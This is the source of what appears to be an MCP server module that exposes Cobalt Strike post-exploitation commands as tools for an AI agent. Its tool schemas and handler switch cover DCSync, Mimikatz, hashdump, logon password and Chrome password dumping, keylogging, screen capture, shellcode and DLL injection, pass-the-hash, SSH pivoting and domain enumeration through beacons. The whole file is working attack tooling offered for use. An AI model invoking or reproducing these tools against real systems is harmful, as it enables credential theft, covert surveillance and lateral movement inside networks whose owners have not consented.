Cobalt Strike MCP Server

/** * Inject operation-related MCP tools */ import { Tool } from '@modelcontextprotocol/sdk/types.js'; import { CobaltStrikeClient } from '../api/client.js'; export function createInjectTools(client: CobaltStrikeClient): Tool[] { return [ { name: 'inject_dcsync', description: 'Perform DCSync attack to extract domain credentials', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, domain: { type: 'string', description: 'Domain to sync from', }, user: { type: 'string', description: 'User to extract credentials for', }, }, required: ['beaconId'], }, }, { name: 'inject_net_computers', description: 'Enumerate computers in the domain', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, domain: { type: 'string', description: 'Optional domain to query', }, }, required: ['beaconId'], }, }, { name: 'inject_net_users', description: 'Enumerate users in the domain', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target domain controller or domain', }, }, required: ['beaconId'], }, }, { name: 'inject_net_user_detail', description: 'Get detailed information about a specific user', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target domain controller', }, user: { type: 'string', description: 'Username to query', }, }, required: ['beaconId', 'target', 'user'], }, }, { name: 'inject_net_groups', description: 'Enumerate groups in the domain', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target domain controller', }, groupName: { type: 'string', description: 'Group name to query', }, }, required: ['beaconId', 'target', 'groupName'], }, }, { name: 'inject_net_sessions', description: 'Enumerate active sessions on a target', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target host to query', }, }, required: ['beaconId', 'target'], }, }, { name: 'inject_net_shares', description: 'Enumerate shares on a target', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target host to query', }, }, required: ['beaconId', 'target'], }, }, { name: 'inject_net_domain_controllers', description: 'List domain controllers in the domain', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, domain: { type: 'string', description: 'Domain to query', }, }, required: ['beaconId'], }, }, { name: 'inject_portscan', description: 'Perform port scan', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, targets: { type: 'string', description: 'Target hosts (comma-separated or CIDR)', }, ports: { type: 'string', description: 'Ports to scan (e.g., "80,443,8080" or "1-1024")', }, }, required: ['beaconId', 'targets', 'ports'], }, }, { name: 'inject_keylogger', description: 'Start keylogger on a process', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, pid: { type: 'number', description: 'Process ID to keylog', minimum: 0, }, }, required: ['beaconId', 'pid'], }, }, { name: 'inject_chromedump', description: 'Dump Chrome passwords', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, }, required: ['beaconId'], }, }, { name: 'inject_net_view', description: 'View network resources', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target host to query', }, }, required: ['beaconId'], }, }, { name: 'inject_net_logons', description: 'Enumerate logged on users', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target host to query', }, }, required: ['beaconId', 'target'], }, }, { name: 'inject_beacon', description: 'Inject beacon into a process', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, pid: { type: 'number', description: 'Process ID to inject into', minimum: 0, }, listener: { type: 'string', description: 'Listener name for the new beacon', }, }, required: ['beaconId', 'pid', 'listener'], }, }, { name: 'inject_dll', description: 'Inject a DLL into a process', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, pid: { type: 'number', description: 'Process ID to inject into', minimum: 0, }, dllPath: { type: 'string', description: 'Path to the DLL file', }, }, required: ['beaconId', 'pid', 'dllPath'], }, }, { name: 'inject_shellcode', description: 'Inject shellcode into a process', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, pid: { type: 'number', description: 'Process ID to inject into', minimum: 0, }, shellcode: { type: 'string', description: 'Shellcode (base64 encoded)', }, }, required: ['beaconId', 'pid', 'shellcode'], }, }, { name: 'inject_mimikatz', description: 'Run Mimikatz (inject mode)', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, command: { type: 'string', description: 'Mimikatz command to execute', }, }, required: ['beaconId', 'command'], }, }, { name: 'inject_hashdump', description: 'Dump password hashes (inject mode)', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, }, required: ['beaconId'], }, }, { name: 'inject_logonPasswords', description: 'Dump logon passwords (inject mode)', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, }, required: ['beaconId'], }, }, { name: 'inject_powershell_unmanaged', description: 'Execute unmanaged PowerShell', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, command: { type: 'string', description: 'PowerShell command to execute', }, }, required: ['beaconId', 'command'], }, }, { name: 'inject_screenshot', description: 'Take screenshot (inject mode)', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, }, required: ['beaconId'], }, }, { name: 'inject_printscreen', description: 'Print screen (inject mode)', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, }, required: ['beaconId'], }, }, { name: 'inject_screenwatch', description: 'Start screen watch (inject mode)', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, }, required: ['beaconId'], }, }, { name: 'inject_browserpivotStart', description: 'Start browser pivot', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, pid: { type: 'number', description: 'Process ID of the browser', minimum: 0, }, }, required: ['beaconId', 'pid'], }, }, { name: 'inject_ssh', description: 'Inject SSH session', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, host: { type: 'string', description: 'SSH host', }, port: { type: 'number', description: 'SSH port', minimum: 1, maximum: 65535, }, username: { type: 'string', description: 'SSH username', }, password: { type: 'string', description: 'SSH password', }, }, required: ['beaconId', 'host', 'username', 'password'], }, }, { name: 'inject_sshKey', description: 'Inject SSH session with key', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, host: { type: 'string', description: 'SSH host', }, port: { type: 'number', description: 'SSH port', minimum: 1, maximum: 65535, }, username: { type: 'string', description: 'SSH username', }, key: { type: 'string', description: 'SSH private key', }, }, required: ['beaconId', 'host', 'username', 'key'], }, }, { name: 'inject_pth', description: 'Pass-the-hash attack', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, domain: { type: 'string', description: 'Domain name', }, username: { type: 'string', description: 'Username', }, hash: { type: 'string', description: 'NTLM hash', }, }, required: ['beaconId', 'domain', 'username', 'hash'], }, }, { name: 'inject_postExDll', description: 'Load post-exploitation DLL', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, dllPath: { type: 'string', description: 'Path to the DLL file', }, }, required: ['beaconId', 'dllPath'], }, }, { name: 'inject_loadDll', description: 'Load DLL', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, dllPath: { type: 'string', description: 'Path to the DLL file', }, }, required: ['beaconId', 'dllPath'], }, }, { name: 'inject_net_dclist', description: 'List domain controllers', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, domain: { type: 'string', description: 'Domain to query', }, }, required: ['beaconId'], }, }, { name: 'inject_net_domainTrusts', description: 'Enumerate domain trusts', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, domain: { type: 'string', description: 'Domain to query', }, }, required: ['beaconId'], }, }, { name: 'inject_net_localGroup', description: 'Enumerate local groups', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target host', }, groupName: { type: 'string', description: 'Group name to query', }, }, required: ['beaconId', 'target', 'groupName'], }, }, { name: 'inject_net_time', description: 'Get time from target', inputSchema: { type: 'object', properties: { beaconId: { type: 'string', description: 'The ID of the beacon', }, target: { type: 'string', description: 'Target host', }, }, required: ['beaconId', 'target'], }, }, ]; } export async function handleInjectTool( name: string, args: any, client: CobaltStrikeClient ): Promise<string> { switch (name) { case 'inject_dcsync': const dcsyncResult = await client.injectDCSync(args.beaconId, args.domain, args.user); return JSON.stringify({ taskId: dcsyncResult, message: 'DCSync command submitted' }, null, 2); case 'inject_net_computers': const computersResult = await client.injectNetComputers(args.beaconId, args.domain); return JSON.stringify({ taskId: computersResult, message: 'Net computers command submitted' }, null, 2); case 'inject_net_users': const usersResult = await client.injectNetUsers(args.beaconId, args.target); return JSON.stringify({ taskId: usersResult, message: 'Net users command submitted' }, null, 2); case 'inject_net_user_detail': const userDetailResult = await client.injectNetUserDetail(args.beaconId, args.target, args.user); return JSON.stringify({ taskId: userDetailResult, message: 'Net user detail command submitted' }, null, 2); case 'inject_net_groups': const groupsResult = await client.injectNetGroups(args.beaconId, args.target, args.groupName); return JSON.stringify({ taskId: groupsResult, message: 'Net groups command submitted' }, null, 2); case 'inject_net_sessions': const sessionsResult = await client.injectNetSessions(args.beaconId, args.target); return JSON.stringify({ taskId: sessionsResult, message: 'Net sessions command submitted' }, null, 2); case 'inject_net_shares': const sharesResult = await client.injectNetShares(args.beaconId, args.target); return JSON.stringify({ taskId: sharesResult, message: 'Net shares command submitted' }, null, 2); case 'inject_net_domain_controllers': const dcResult = await client.injectNetDomainControllers(args.beaconId, args.domain); return JSON.stringify({ taskId: dcResult, message: 'Net domain controllers command submitted' }, null, 2); case 'inject_portscan': const portscanResult = await client.injectPortscan(args.beaconId, args.targets, args.ports); return JSON.stringify({ taskId: portscanResult, message: 'Port scan command submitted' }, null, 2); case 'inject_keylogger': const keyloggerResult = await client.injectKeylogger(args.beaconId, args.pid); return JSON.stringify({ taskId: keyloggerResult, message: 'Keylogger command submitted' }, null, 2); case 'inject_chromedump': const chromedumpResult = await client.injectChromedump(args.beaconId); return JSON.stringify({ taskId: chromedumpResult, message: 'Chrome dump command submitted' }, null, 2); case 'inject_net_view': const netViewResult = await client.injectNetView(args.beaconId, args.target); return JSON.stringify({ taskId: netViewResult, message: 'Net view command submitted' }, null, 2); case 'inject_net_logons': const netLogonsResult = await client.injectNetLogons(args.beaconId, args.target); return JSON.stringify({ taskId: netLogonsResult, message: 'Net logons command submitted' }, null, 2); case 'inject_beacon': const injectBeaconResult = await client.injectBeacon(args.beaconId, args.pid, args.listener); return JSON.stringify({ taskId: injectBeaconResult, message: 'Inject beacon command submitted' }, null, 2); case 'inject_dll': const injectDllResult = await client.injectDLL(args.beaconId, args.pid, args.dllPath); return JSON.stringify({ taskId: injectDllResult, message: 'Inject DLL command submitted' }, null, 2); case 'inject_shellcode': const injectShellcodeResult = await client.injectShellcode(args.beaconId, args.pid, args.shellcode); return JSON.stringify({ taskId: injectShellcodeResult, message: 'Inject shellcode command submitted' }, null, 2); case 'inject_mimikatz': const injectMimikatzResult = await client.injectMimikatz(args.beaconId, args.command); return JSON.stringify({ taskId: injectMimikatzResult, message: 'Inject Mimikatz command submitted' }, null, 2); case 'inject_hashdump': const injectHashdumpResult = await client.injectHashdump(args.beaconId); return JSON.stringify({ taskId: injectHashdumpResult, message: 'Inject hashdump command submitted' }, null, 2); case 'inject_logonPasswords': const injectLogonPasswordsResult = await client.injectLogonPasswords(args.beaconId); return JSON.stringify({ taskId: injectLogonPasswordsResult, message: 'Inject logon passwords command submitted' }, null, 2); case 'inject_powershell_unmanaged': const injectPSUnmanagedResult = await client.injectPowerShellUnmanaged(args.beaconId, args.command); return JSON.stringify({ taskId: injectPSUnmanagedResult, message: 'Inject PowerShell unmanaged command submitted' }, null, 2); case 'inject_screenshot': const injectScreenshotResult = await client.injectScreenshot(args.beaconId); return JSON.stringify({ taskId: injectScreenshotResult, message: 'Inject screenshot command submitted' }, null, 2); case 'inject_printscreen': const injectPrintscreenResult = await client.injectPrintscreen(args.beaconId); return JSON.stringify({ taskId: injectPrintscreenResult, message: 'Inject printscreen command submitted' }, null, 2); case 'inject_screenwatch': const injectScreenwatchResult = await client.injectScreenwatch(args.beaconId); return JSON.stringify({ taskId: injectScreenwatchResult, message: 'Inject screenwatch command submitted' }, null, 2); case 'inject_browserpivotStart': const injectBrowserPivotResult = await client.injectBrowserPivotStart(args.beaconId, args.pid); return JSON.stringify({ taskId: injectBrowserPivotResult, message: 'Inject browser pivot start command submitted' }, null, 2); case 'inject_ssh': const injectSSHResult = await client.injectSSH(args.beaconId, args.host, args.port, args.username, args.password); return JSON.stringify({ taskId: injectSSHResult, message: 'Inject SSH command submitted' }, null, 2); case 'inject_sshKey': const injectSSHKeyResult = await client.injectSSHKey(args.beaconId, args.host, args.port, args.username, args.key); return JSON.stringify({ taskId: injectSSHKeyResult, message: 'Inject SSH key command submitted' }, null, 2); case 'inject_pth': const injectPTHResult = await client.injectPTH(args.beaconId, args.domain, args.username, args.hash); return JSON.stringify({ taskId: injectPTHResult, message: 'Inject PTH command submitted' }, null, 2); case 'inject_postExDll': const injectPostExDllResult = await client.injectPostExDll(args.beaconId, args.dllPath); return JSON.stringify({ taskId: injectPostExDllResult, message: 'Inject post-ex DLL command submitted' }, null, 2); case 'inject_loadDll': const injectLoadDllResult = await client.injectLoadDll(args.beaconId, args.dllPath); return JSON.stringify({ taskId: injectLoadDllResult, message: 'Inject load DLL command submitted' }, null, 2); case 'inject_net_dclist': const injectNetDclistResult = await client.injectNetDclist(args.beaconId, args.domain); return JSON.stringify({ taskId: injectNetDclistResult, message: 'Inject net dclist command submitted' }, null, 2); case 'inject_net_domainTrusts': const injectNetDomainTrustsResult = await client.injectNetDomainTrusts(args.beaconId, args.domain); return JSON.stringify({ taskId: injectNetDomainTrustsResult, message: 'Inject net domain trusts command submitted' }, null, 2); case 'inject_net_localGroup': const injectNetLocalGroupResult = await client.injectNetLocalGroup(args.beaconId, args.target, args.groupName); return JSON.stringify({ taskId: injectNetLocalGroupResult, message: 'Inject net local group command submitted' }, null, 2); case 'inject_net_time': const injectNetTimeResult = await client.injectNetTime(args.beaconId, args.target); return JSON.stringify({ taskId: injectNetTimeResult, message: 'Inject net time command submitted' }, null, 2); default: throw new Error(`Unknown inject tool: ${name}`); } }